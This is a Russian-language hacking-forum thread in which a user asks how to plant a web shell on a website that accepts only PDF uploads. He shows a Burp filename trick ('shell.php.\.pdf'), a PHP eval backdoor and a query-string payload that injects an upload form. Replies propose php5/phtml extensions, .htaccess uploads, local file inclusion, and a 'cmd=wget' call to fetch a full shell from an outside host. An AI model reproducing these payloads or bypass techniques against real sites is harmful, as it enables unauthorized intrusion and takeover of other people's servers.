• XSS.stack #1 – первый литературный журнал от юзеров форума

Помогите с заливкой шела

Отслеживать

k0000t

HDD-drive
Пользователь
Регистрация
09.11.2019
Сообщения
33
Реакции
2
Гарант сделки
2
Депозит
0.0036
на сайт можно загрузить только pdf файл, если через бурп поправить имя файла на shell.php.\.pdf и Content-Type: application/pdf то заливается файл с названием .pdf и отображается вот так

Снимок экрана 2023-04-28 в 10.18.31.png


подскажите можно ли что-либо с этим сделать? залить не wso а что-нибудь другое ??
пробовал загружать Weevely но не могу к нему подключиться
 
залить можно, как php оно обрабатываться скорее всего не будет, можно попробовать поиграться с расширениями типа php5 и т.д. но скорее всего не получится. можно еще htaccess пробовать заливать или локальный инклуд где-нибудь искать
 
Fargo сказал(а):
не пробовал подгрузить обычный eval с cmd и wget'ом подгрузить полноценный шелл?
пробовал только залить файл с кодом
Код: 
<?php eval($_GET[cmd]); ?>
а потом перейти по адресу
Код: 
 .pdf??cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>

но вижу пустую страницу;(

а как это сделать wget запросом?
 
k0000t сказал(а):
пробовал только залить файл с кодом
Код: 
<?php eval($_GET[cmd]); ?>
а потом перейти по адресу
Код: 
 .pdf??cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>

но вижу пустую страницу;(

а как это сделать wget запросом?
Ну вобще команды сервака выполняются через cmd?
?cmd=wget https://...shell.php
можно грузить в любом расширении по прямой ссылке, на ходу переименовав в любое другое как писали выше, php5, phtml и тд.
 
Последнее редактирование:
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх